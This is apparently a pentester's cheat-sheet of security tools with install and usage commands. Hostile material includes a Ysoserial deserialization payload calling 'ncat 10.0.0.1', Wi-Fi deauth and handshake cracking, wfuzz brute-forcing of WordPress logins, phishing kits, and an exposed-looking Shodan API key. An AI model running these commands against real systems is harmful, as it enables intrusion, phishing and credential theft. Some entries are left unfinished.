Reference List
Lynis – An auditing tool for Unix-based systems. It scans the system by performing many security control checks [Link].
sudo apt install lynis sudo lynis audit system sudo lynis -Q --cronjob
BeEF – It is classified as a penetration testing tool that focuses on the web browser but in fact, it is a very malicious tool that can be used to exploit web vulnerabilities. The phishing features are incredible and mimic GMail or Facebook login pages for example [Link].
sudo apt install beef-xss sudo beef-xss
It is going to ask for the new password.
On the browser go to http://127.0.0.1:3000/ui/panel. The default user is beef.
Autopsy – A digital forensic tool used by law enforcement officials to investigate what happened on your computer, drive, and flash drives [Link].
sudo autopsy OR sudo autopsy &
On the browser go to http://localhost:9999/autopsy.
King Phisher – A tool for Phishing Awareness Campaign [Link].
sudo systemctl start postgresql sudo systemctl start king-phisher cd /usr/share/king-phisher/ sudo ./KingPhisherServer server_config.yml
If port 80 is being in use you will have to kill the process (e.g. 123456):
sudo netstat -tulpn sudo kill 123456
Leave it running in one terminal and on another terminal:
cd /usr/share/king-phisher ./KingPhisher
Kali Linux already has it installed and it is accessible from the main menu.
Yersinia – A DHCP Starvation attacking tool. One attached can make the DHCP server inoperative and act as the DHCP server of the network, usually assigning itself as the DNS server and directing the users to malicious websites [Link].
sudo apt install yersinia sudo yersinia -G
SocialEngineeringToolkit – SET is an open-source penetration testing framework with a big number of custom attack vectors [Link].
sudo setoolkit
Ettercap – Man-in-the-middle attack tool using ARP poisoning [Link].
- Select the interface(s) used for the attack, and click on the button accept,
- Scan the network for hosts, list them, and add the targets to the target groups 1 and 2,
- On the MITM, select ARP poisoning,
- If not started, start the sniffing,
- Now check the ARP table on both devices and compare it to the real ones,
- On the man-in-the-middle box, use Wireshark or TCP Dump for example to capture the packets being transmitted between both targets.
Bettercap – Alternative to Ettercap, with additional features such as WIFI [Link].
sudo apt install bettercap sudo bettercap --iface wlan0 >> wifi.recon on >> events.ignore wifi.ap.new >> set net.sniff.output handshake.pcap >> net.sniff on >> events.ignore net.sniff.802.11 >> wifi.show >> wifi.recon.channel.channel 11 >> wifi.show >> wifi.deauth FF:FF:FF:FF:FF:FF >> events.ignore wifi.client.probe
AirCrack-ng – It consists of a detector, packet sniffer, WEP/WPA/WPA2-PSK cracker, and analysis tool for 802.11 [Link].
sudo apt install aircrack-ng sudo aircrack-ng handshake.pcap -w /usr/share/wordlists/rockyou.txt.gz
LazyRecon – It is a very straightforward scanner intended to automate some tedious tasks of reconnaissance and information gathering in an HTML report format [Link].
git clone https://github.com/nahamsec/lazyrecon.git ./lazyrecon.sh -d example.com -e excluded.example.com
Wapiti – A web application security scanner. It performs “black-box” scans (it does not study the source code) on the web application by crawling the webpages looking for scripts and forms where it can inject data in an HTML report format [Link].
wapiti -u https://example.com
SpiderFoot – It uses OSINT to gather information about a specific target of an investigation. It crawls the websites looking for IPs,
domains/sub-domain, hostnames, network subnets (CIDR), autonomous system numbers (ASN), e-mails, phone numbers, usernames, person’s name, and bitcoin address. Then, using 200+ modules it can gatter even more information about it. For example, transactions and balance of the acquired Bitcoin addresses [Link].
sudo spiderfoot -m sfp_spider,sfp_bitcoin,sfp_blockchain -s example.com -F BITCOIN_ADDRESS,BITCOIN_BALANCE -q sudo spiderfoot -m sfp_spider,sfp_ethereum -s exemple.com -F ETHEREUM_ADDRESS -q
Ysoserial – A collection of utilities used for exploiting Java applications performing unsafe deserialization of objects and using vulnerable libraries in order to get remote code execution [Link].
java -jar ysoserial.jar CommonsCollections4 ncat 10.0.0.1 8888 > payload cat payload | nc 10.10.10.10 123456
First Ysoserial was used to create a Java payload according to the chosen vulnerability and remote command to be executed. Then the payload was fired up on the netcat connection (where the example’s vulnerable application was listening on).
NoSQLMap – A tool designed to automate injection attacks and exploit default configuration weaknesses in NoSQL databases (such as MongoDB) and web apps using NoSQL [Link].
git clone https://github.com/codingo/NoSQLMap.git ./setup.py ./nosqlmap.py
MobSF – Mobile Security Framework is a mobile application (Android/iOS/Windows) malware analyzer. It is capable of performing static and dynamic analysis in a sandbox and generate reports [Link].
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git cd Mobile-Security-Framework-MobSF ./setup.sh ./run.sh 127.0.0.1:8000
Then go to the web browser and access http://localhost:8000/.
Upload the app file (APK, for example) and play with the functionalities.
JADX – It is a (CLI and GUI) tool for producing Java source code (decompiler) from Android Dex and Apk files [Link]. See also the Dex2Jar [Link] and JAD [Link].
sudo apt install jadx jadx app.apk
Frida – A toolkit for developers, reverse-engineers, and security researchers. It is a dynamic binary instrumentation framework [Link].
pip install frida-tools OR docker run --security-opt seccomp:unconfined -it name_of_the_docker /bin/bash
Basic commands:
- frida-ps
- List all running processes names and PIDs running.
- frida-ps -U
- List on a USB device.
- frida-ls-devices
- List all attached devices.
- frida-trace -U Twitter -i “recv*”
- Traces native APIs.
Recon-ng – It is a web reconnaissance framework designed exclusively for web-based open source [Link].
recon-ng > marketplace search contacts > marketplace install recon/domains-contacts/whois_pocs > modules load recon/domains-contacts/whois_pocs > info > options unset SOURCE > options set SOURCE example.com > run > back > marketplace search domain > marketplace install recon/domains-hosts/bing_domain_web > modules load recon/domains-hosts/bing_domain_web > options set SOURCE example.com > run > marketplace search google > marketplace install recon/domains-hosts/google_site_web > modules load recon/domains-hosts/google_site_web > options set SOURCE example.com > run > arketplace search interesting > marketplace install discovery/info_disclosure/interesting_files > modules load discovery/info_disclosure/interesting_files > options set PORT 443 > options set PROTOCOL https > run > shell ls ~/.recon-ng/workspaces/default/ > marketplace search shodan > marketplace install recon/domains-hosts/shodan_hostname > keys add Y9yraMjfdgUTSy9Z5okhnDQeWadPw2dP > modules load recon/domains-hosts/shodan_hostname > options set SOURCE example.com > run > show hosts > show contacts > workspaces create new > show hosts > workspaces list > workspaces load default > db schema > db delete hosts > db insert hosts > marketplace search report > marketplace install reporting/html > modules load reporting/html > options set CREATOR MyName > options set CUSTOMER MyClient > run > exit
Web Interface
locate recon-web /usr/share/recon-ng/recon-web
WPScan – A free WordPress security scanner [Link].
wpscan --update wpscan --url https://example.com wpscan --url https://example.com --enumerate p wpscan --url https://example.com --enumerate u wpscan --url https://example.com --enumerate t wpscan --url https://example.com --enumerate tt wpscan --url https://example.com --proxy 127.0.0.1:8118 wpscan --url https://example.com --wordlist word.lst --threads 50 --username admin
Naabu – A simple and fast ports for enumerating valid ports using fast SYN scan on the host/list of hosts [Link].
docker pull projectdiscovery/naabu docker run -it projectdiscovery/naabu -host example.com -silent docker run -it projectdiscovery/naabu -host example.com -silent -p - docker run -it projectdiscovery/naabu -host example.com -silent -iL hosts.txt docker run -it projectdiscovery/naabu -host example.com -silent -nmap-cli 'nmap -sV' docker run -it projectdiscovery/naabu -host example.com -silent -o output.txt docker run -it projectdiscovery/naabu -host example.com -silent -interface eth0 docker run -it projectdiscovery/naabu -host example.com -silent -source-ip 10.10.10.10
FFUF – Fuzzing tool for web applications [Link].
sudo apt install golang-go go get -u github.com/ffuf/ffuf ~/go/bin/ffuf -V OR sudo apt install ffuf ffuf -V
Usage:
ffuf -u https://example.com/FUZZ/ -w word.lst ffuf -u https://example.com/?s=FUZZ -w word.lst ffuf -u https://example.com/FUZZ -w word.lst -c ffuf -u https://example.com/FUZZ -w word.lst -sf ffuf -u https://example.com/FUZZ -w word.lst -recursion -e .bak ffuf -u https://example.com/FUZZ -w word.lst -s -of html -o output.txt ffuf -u https://W1.com/W2 -w domain.lst:W1 -w word.lst:W2 ffuf -u https://example.com/ -X POST -d "username=W1\&password=W2" -w users.lst:W1 -w passes.lst:W2 ffuf -u https://example.com/FUZZ -w word.lst -x http://proxy:port ffuf -u https://example.com/FUZZ -w word.lst -x socks5://127.0.0.1:9150
wFuzz – Another fuzzing tool for web applications [Link]. It can be used with FuzzHTTPBypass [Link] to automate fuzzing to try to bypass unknown authentication methods.
Installation
sudo apt install wfuzz -y OR pip3 install wfuzz
Usage
wfuzz -c -v --hc 404 -w word.lst http://example.com/FUZZ wfuzz -c -z file,/PATH/users.lst -z file,/PATH/passes.lst,md5 -d "user=FUZZ&pass=FUZ2Z" --sc 200 http://example.com/wp-login.php wfuzz -c -z range,0-255 http://102.168.1.FUZZ/ wfuzz -c -z list,zip-tar-gz-bkp-backup-copy-txt http://example.com/credentials.FUZZ wfuzz -c -w word.lst -f /PATH/output,csv http://example.com/FUZZ wfuzz -c -w word.lst -p 127.0.0.1:8080:HTTP http://example.com/FUZZ wfuzz -c -w user-agents.lst --ss "Welcome " -H "User-Agent: FUZZ" http://example.com/target.php wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://example.com/target.php
Available output formats:
wfuzz -e printers- csv
- Text comma separated file.
- field
- Only fields, no header or footer
- html
- HTML formated.
- json
- JSON formated.
- magictree
- Prints friendly in a tree format.
- raw
- No formating.
- csv
Available Encoders:
wfuzz -e encoders- utf8
- base64
- urlencode
- double_urlencode
- md5
- sha256
- mssql_char
- …
Proxy types:
- HTTP
- Default
- SOCKS4
- SOCKS5
Filtering results using simple or regex expression:
- –hs/ss “Invalid username”
- Hide/Show using Simples expression.
- –hs/ss “Invalid *”
- Hide/Show using Regex.
- –hc/sc CODE
- Hide/Show by code in response
- –hl/sl NUM
- Hide/Show by number of lines in response
- –hw/sw NUM
- Hide/Show by number of words in response
- –hc/sc NUM
- Hide/Show by number of chars in response.
.
DirSearch – x [Link].
git clone https://github.com/maurosoria/dirsearch.git cd dirsearch pip3 install -r requirements.txt ./dirsearch.py -u https://example.com ./dirsearch.py -e php,asp,cgi -w word.lst -r -R 5 -t50 -m POST --data "username=admin" -u https://example.com
SubFinder – Designed to discover valid subdomains using passive online sources [Link].
sudo apt install subfinder -y subfinder -d example.com subfinder -d example.com -silent subfinder -v -d example.com subfinder -dL domains.txt
HTTPx – x [Link].
git clone https://github.com/projectdiscovery/httpx.git; cd httpx/cmd/httpx; go build; sudo mv httpx /usr/local/bin/; httpx -version echo example.com | httpx echo example.com | httpx -silent subfinder -d example.com -silent | httpx -silent